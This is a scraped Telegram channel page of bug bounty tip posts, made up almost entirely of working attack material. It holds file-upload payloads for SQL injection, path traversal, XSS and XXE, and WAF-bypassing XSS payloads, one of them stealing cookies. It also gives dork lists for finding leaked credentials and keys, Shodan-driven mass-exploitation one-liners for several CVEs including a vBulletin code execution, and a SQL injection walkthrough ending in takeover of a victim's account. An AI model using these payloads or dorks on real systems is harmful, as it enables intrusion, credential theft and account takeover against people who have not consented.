CTF | Bug Bounty
๐ Join Us for ๐ ๐ CTF Resources ๐ Bug Bounty Resources ๐ CTF Challenges and More Join now: https://t.me/ctftm ๐ค Owner: Team Matrix แด แดแดแด/แดแดแดสสษชษขสแด แดสแดษชแด : @Dmcatm Admin Contact: @Teammatrixs_bot
Show more7 992
Subscribers
+124 hours
+137 days
-930 days
- Subscribers
- Post coverage
- ER - engagement ratio
Data loading in progress...
Subscriber growth rate
Data loading in progress...
๐จ XSS Hunting from WaybackURLS ๐
Payload :
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss
#bugbountytips #bugbounty
๐ฅ 6๐ 3โค 1๐ 1
๐ฅChaining Vulnerabilities through File Upload๐ฅ
SLQiโณ
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversalโณ
../../etc/passwd/logo.png
../../../logo.png
XSSโณ
-> Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"
-> Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;
-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>
-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1โฆ"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>
Open redirect โณ
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
XXE โณ
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>
====================
Join Our Telegram Channel
https://t.me/ctftm๐ฅ 4
๐ฅ Github-Dork
Happy Hunting
๐ api_key
๐ app_AWS_SECRET_ACCESS_KEY
๐ app_secret
๐ authoriztion
๐ Ldap
๐ aws_access_key_id
๐ secret
๐ bash_history
๐ bashrc%20password
๐ beanstalkd
๐ client secre
๐ composer
๐ config
๐ credentials
๐ DB_PASSWORD
๐ dotfiles
๐ .env file
๐ .exs file
๐ extension:json mongolab.com
๐ extension:pem%20private
๐ extension:ppk private
๐ extension:sql mysql dump
๐ extension:yaml mongolab.com
๐ .mlab.com password
๐ mysql
๐ npmrc%20_auth
๐ passwd
๐ passkey
๐ rds.amazonaws.com password
๐ s3cfg
๐ send_key
๐ token
๐ filename:.bash_history
๐ filename:.bash_profile aws
๐ filename:.bashrc mailchimp
๐ filename:CCCam.cfg
๐ filename:config irc_pass
๐ filename:config.php dbpasswd
๐ filename:config.json auths
๐ filename:config.php pass
๐ filename:config.php dbpasswd
๐ filename:connections.xml
๐ filename:.cshrc
๐ filename:.git-credentials
๐ filename:.ftpconfig
๐ filename:.history
๐ filename:gitlab-recovery-codes.txt
๐ filename:.htpasswd
๐ filename:id_rsa
๐ filename:.netrc password
๐ FTP
๐ filename:wp-config.php
๐ git-credentials
๐ github_token
๐ HEROKU_API_KEY language:json
๐ HEROKU_API_KEY language:shell
๐ GITHUB_API_TOKEN language:shell
๐ oauth
๐ OTP
๐ databases password
๐ [WFClient] Password= extension:ica
๐ xoxa_Jenkins
๐ security_credentials
#bugbountytips #GitHub
====================
Join Our Telegram Channel
https://t.me/ctftm
๐ฅ 6
Photo unavailableShow in Telegram
====================
Join Our Telegram Channel
https://t.me/ctftm====================
Join Our Telegram Channel
https://t.me/ctftmNew Xss Fly Under Radar Cloudflare Bypass ๐งฑ
Payload :
"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
Credit -Halim
====================
Join Our Telegram Channel
https://t.me/ctftm
๐ฅ 3
Awesome One-liner Bug Bounty :
> A collection of awesome one-liner scripts especially for bug bounty.
This repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartilyโฅ welcome.
## Definitions
This section defines specific terms or placeholders that are used throughout one-line command/scripts.
- 1.1. "HOST" defines one hostname, (sub)domain, or IP address, e.g. replaced by
internal.host
, domain.tld
, sub.domain.tld
, or 127.0.0.1
.
- 1.2. "HOSTS.txt" contains criteria 1.1 with more than one in file.
- 2.1. "URL" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html
or somewhat starting with HTTP/HTTPS protocol.
- 2.2. "URLS.txt" contains criteria 2.1 with more than one in file.
- 3.1. "FILE.txt" or "FILE{N}
.txt" means the files needed to run the command/script according to its context and needs.
- 4.1. "OUT.txt" or "OUT{N}
.txt" means the file as the target storage result will be the command that is executed.
---
### Local File Inclusion
> @dwisiswant0
gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
### Open-redirect
> @dwisiswant0
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
> @N3T_hunt3r
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null
### XSS
> @cihanmehmet
gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt
> @fanimalikhack
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
> @oliverrickfors
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
### Prototype Pollution
> @R0X4R
subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"
### CVE-2020-5902
> @Madrobot_
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
### CVE-2020-3452
> @vict0ni
while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < HOSTS.txt
### CVE-2022-0378
> @7h3h4ckv157
cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done
### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
> @Madrobot_
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
### Find JavaScript Files
====================
Join Our Telegram Channel
https://t.me/ctftmPhoto unavailableShow in Telegram
Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
#BugBounty #bugbountytipsโค 2
Photo unavailableShow in Telegram
SQL Injection to Account Takeover Manually :)
1. Enter mobile number to login intercept
{"mobile_number":"8888888888"} >> 200
{"mobile_number":"8888888888'"} >> 500
{"mobile_number":"8888888888''"} >> 200
2. Final Query:
8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') --
2024-04-03 21:20:55 >> Exact time and date
1 >> attempts
you can see the 200 response
last you can login with the 1110 OTP and get access to the victim account :)
====================
Join Our Telegram Channel
https://t.me/ctftm
๐ 3
Photo unavailableShow in Telegram
(Hard filter+Cloudflare bypassed) Stored XSS leads account takeover
Payload: xyz';"/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)>
Tips: Always play with input's => reflecting value's tags. even there is waf/cloudflare.
#bugbountytip #bugbounty
Azure OSINT Google Dork List
- site:blob.core.windows.net โkeywordโ
- site:"blob.core.windows.net" and intext:"CONFIDENTIAL"
- site:*.core.windows.net intext:"TLP:RED"
- site:*.core.windows.net
- site:*.core.windows.net +blob
- site:*.core.windows.net +files -web -blob
- site:*.core.windows.net -web
- site:*.core.windows.net -web -blob -files
- site:*.core.windows.net inurl:dsts.dsts
- site:*.core.windows.net inurl:"term" -web
- site:*.blob.core.windows.net ext:xls | ext:xlsx (login | password | username)
- intext:connectionstring blob filetype:config
- intext:accountkey windows.net filetype:xml
- intext:storageaccountkey windows.net filetype:txt
Please Share Across Your Network, Someone Might Really Be Looking For This.
#Infosec #GHDB #Azure #bugbounty
New XSS Bypass Cloudflare WAF ๐งฑ
Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E